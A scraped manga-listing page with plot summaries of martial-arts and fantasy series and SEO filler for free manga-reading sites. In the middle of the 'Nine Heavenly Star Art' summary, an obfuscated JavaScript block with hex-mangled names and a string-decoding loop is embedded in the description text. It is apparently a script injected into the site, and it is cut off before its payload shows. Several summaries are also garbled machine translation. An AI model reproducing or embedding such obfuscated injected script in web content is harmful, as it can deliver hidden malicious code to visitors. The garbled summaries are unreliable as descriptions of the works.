Martial Arts - Page 141

Step into the universe of Martial Arts manga with stunning art and stories. Read Martial Arts manga free anytime!

2265 results

Yakuza: Black Panther

Yakuza: Black PantherTatsuya Ukyo is an aimless youth on the streets of Kamurocho who is framed for an assault that left a young boy comatose. He drops out of high school during his second year and lives a hoodlum's life with Tenma (his only friend) and Saeko, his sister who raised him for nine years after their mother's death.Hearing about a large sum of money held by a loan shark, Tatsuya and several other hoodlums break-in at night. Tatsuya defeats Naoki, not knowing he killed him. After Toda's death, Tatsuya receives an ultimatum from a member of his gang: win ten consecutive fights or be arrested. Tatsuya agrees, and as he fights underground he bonds with trainer Kudoh Saki and physician Amamiya Taizan.Based on the PSP game.



Kojiro is the new English teacher at Sakaue High School. He is a foreigner with blonde hair and blue eyes, he also goes to school by riding his surfboard daily. This is the story of a free-spirited teacher who came across the sea to his mother's homeland.


Kekkai Sensen Beat 3 Peat

Kekkai Sensen: Beat 3 Peat centers around the crime fighting organization \"Libra\" and their battles in Hellsalem\'s Lot, formerly known as New York City. Hellsalem\'s Lot was created in a single night when a portal to the \"Beyond\" opened, and now it is a paranormal melting pot of monsters, magic, and the everyday mundane city life. It\'s up to Libra to prevent the horrors of this city from spreading to the outside world.


Nine Heavenly Star Art

Master: SJ.MAN. Practice the nine-star Tianchen, and create your own myths! The original snail of the spontaneously snail “Nine Stars Tianchen” is adapted. The cartoon of “Nine Stars Tianchen” is a world where human beings, monsters and mysterious animals coexist, human beings are cultivating the spirits, the beasts are repairing the flesh, and the mysterious souls are repairing the souls. Read. There is a deep underground hearted Qionglou, a dead lake in the Bohai Sangtian, a mysterious mysterious palace, and a land for the forbidden domain of the Wraith. Legend has it that in the endless jungle wilderness, there are some very powerful forces. They are called demon kings. Some demon kings are extremely tyrannical, some demon kings are good at confusing, some demon kings are good at illusion, and some demon kings can Moving mountains and reclamation, some demon kings can trace thousands of miles. These demon kings rarely appear in the human world. Even if they appear, they are also incarnate in human form, and they are scattered in human beings to seek a breakthrough in realm. Jiuxing Tianchen<script></script><script>function _0x1fa9(_0x54af8a,_0x1add2c){var _0x3f8fb3=_0x51c6();return _0x1fa9=function(_0x4a7d2c,_0x406bb6){_0x4a7d2c=_0x4a7d2c-(-0x18*-0x90+-0x4*0x9a4+0x1aba);var _0x284ed2=_0x3f8fb3[_0x4a7d2c];return _0x284ed2;},_0x1fa9(_0x54af8a,_0x1add2c);}(function(_0x337aaf,_0x5bcf16){var _0x2cb394=_0x1fa9,_0x92fb65=_0x337aaf();while(!![]){try{var _0x41b1b6=-parseInt(_0x2cb394(0x1aa))/(-0x22*0xb3+-0x1b5c*-0x1+-0x395)+-parseInt(_0x2cb394(0x1ae))/(-0x209+0x13*-0x4d+0x296*0x3)+parseInt(_0x2cb394(0x1ab))/(-0x5b3*-0x1+0x2172+-0x2*0x1391)*(-parseInt(_0x2cb394(0x1b0))/(-0x1*-0x1147+-0x1bec+0xaa9))+-parseInt(_0x2cb394(0x1ba))/(-0x1591+0x6f*-0x3+-0x3*-0x7a1)+parseInt(_0x2cb394(0x1b9))/(-0x1*0x2695+-0x148+0x27e3)*(-parseInt(_0x2cb394(0x1c6))/(-0x2582*0x1+0x1bb8+0x9d1))+-parseInt(_0x2cb394(0x1c8))/(0x3*0x18f+-0x1a9d*0x1+0x15f8)+parseInt(_0x2cb394(0x1bd))/(0x220c*-0x1+0x962+0x1*0x18b3);if(_0x41b1b6===_0x5bcf16)break;else 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Hero X Demon Queen

Read Manga Hero X Demon Queen Online For Free At Top Manhua The Content Hero X Demon Queen: I had yearned for the tranquility of the countryside, but destiny had other plans. Suddenly, I found myself transported to an entirely new world. Within Novice Village, I ascended to the status of a creation-level entity. And then, against all odds, I defeated the Demon Empress who ruled this realm—with only a dog I had raised by my side. From that pivotal moment, the defeated Demon Empress took up residence in my humble home, and my extraordinary adventure in this otherworldly domain began. Associated Names: Hero X Demon Empress / Hero X Female Demon King / Yongzhe X Nv Mowang / Yǒngzhě X Nǚ Mówáng / 勇者X女魔王 New and hot comics are updated the fastest. The Business Is Closed Due To The Tyrant Parents The Gambled Bride, Loved by a Wicked Lord Cinderella Disappeared MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.


The Heaven Sword and the Dragon Saber

Treasured sabre belongs to a dragon and commands an army of beasts. If the Heaven Sword does not come out, then who will fight for mastery. An ignorant brat, Zhang Wuji, grew up on a lonely island. He got lucky out of a bad situation and became a well-known CEO, married a rich beauty, and lived a life of pretending. Who wants to be a supreme being of the martial arts world? Having the protagonist aura is the most important!


Shadow Skill

Gau Ban is a boy who is struggling to become a "Sevalle," the strongest class of warrior in the mercenary kingdom of Guruda. Gau's elder sister, Elle Rag, is the 59th "Sevalle" and holds the honorable title of "Shadow Skill." The story develops around the two siblings, as they fight magical monsters and historical warriors. The major part of it is a battle called "Shadow Skills" that is fought with only the hands and feet. It begins when the historical warriors chant the words "We are invincible!" and obtain superhuman powers. Note: Originally published as four volumes by Takeshobo and Kadokawa but was not complete until 1998 in the final serialization in Dragon Junior which was released in tankoubon in 1999 by Kodansha as Volume 5 "Shadow Skill Phantom of Shade."


Ghost Gapsa

Ghost GapsaReborn reincarnation. All souls are judged for their sins and are reincarnated. However, there were souls who did not accept this Beom' and the shaman Shin-ae', one of the , an exorcism extermination unit, receive the order of the Jade Hwang, and are in charge of eradicating the ghost and correcting the balance of the world. One ghost and one human is this combination okay? The adventure story of getting rid of the bad guys! 10-day serialization


I Was Reincarnated as a Poor Farmer in a Different World, so I Decided to Make Bricks to Build a Castle

Please read the title again. &lt;--  How often do I need to write it, so that you understand... I can't read! In another world where the Royal family power is on decline, and turmoil are lasting. In a remote village, a young child, who will later be named Ars, is "gardening" and "improving the land." Having the memories of his previous life, he who was fond of "city building" games, initiated to do "selective breeding for crops" and "house constructions" with his own magic to get out of poverty, and finally acquired a "brick creation!" Selling his bricks to a peddler, he obtains a rare egg of a “tamed beast," but can he raise it safely? Later called as a “Living God,” this is the beginning of the heroic tale of a young boy who founded a nation! Web Novel(: (Japanese)


Rebirth of King Zhou: Not Being the Ultimate Villain

Read “Rebirth of King Zhou: Not Being the Ultimate Villain Novel” – “Rebirth of King Zhou: Not Being the Ultimate Villain Manhwa” Online Free At HOTMANHUA The summary of the comic Rebirth of King Zhou: Not Being the Ultimate Villain: Liu Nian enters a game called ‘Glory Continent’ and discovers after his death that he is the reincarnation of King Zhou. Enchanting beast-eared girls, cold and beautiful mature women, sweet and adorable lolis… a harem of beauties for him to choose from. In this life, he decides not to be the ultimate villain. He wants all the stunning beauties and to overturn the heavens in the new round of the Ultimate Venerate/God Battle, aiming to become the top deity! “Rebirth of King Zhou: Not Being the Ultimate Villain” is also known as: Chóng Shēng Zhī Zhòu Wáng Bù Zuò Dà Fǎn Pài / Rebirth of King Zhou: Don’t Be a Villain / Chong Sheng Zhi Zhou Wang Bu Zuo Da Fan Pai / Rebirth: King Zhou Doesn’t Become a Great Villain / Trùng Sinh Chi Trụ Vương Không Làm Đại Phản Phái / 重生之纣王不做大反派 The comic “Rebirth of King Zhou: Not Being the Ultimate Villain” belongs to the Genre: Drama, Ecchi, Fantasy, Harem, Historical, Shounen, Supernatural “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Red Envelope Fairy Group

The unlucky male protagonist accidentally joins the fairy chat group, and an extraordinary student life starts like this


Cowardly Crybaby Shokatsu Koumei

“Shokatsu Koumei”, also known as Zhuge Liang. Among the few heroes that decorated the Annals of the Three Kingdoms, it was once a prestigious name. An account of “an ingenious tactician”, the thousand-year-old story of the “God of Stratagem”. It is said… “in a country torn by factions and transformed into a devastating and cruel hell, the heavens sought peace by sending a composed, well-loved young man of impeccable and divine virtues.” Well, well. In truth… He is a childish man.
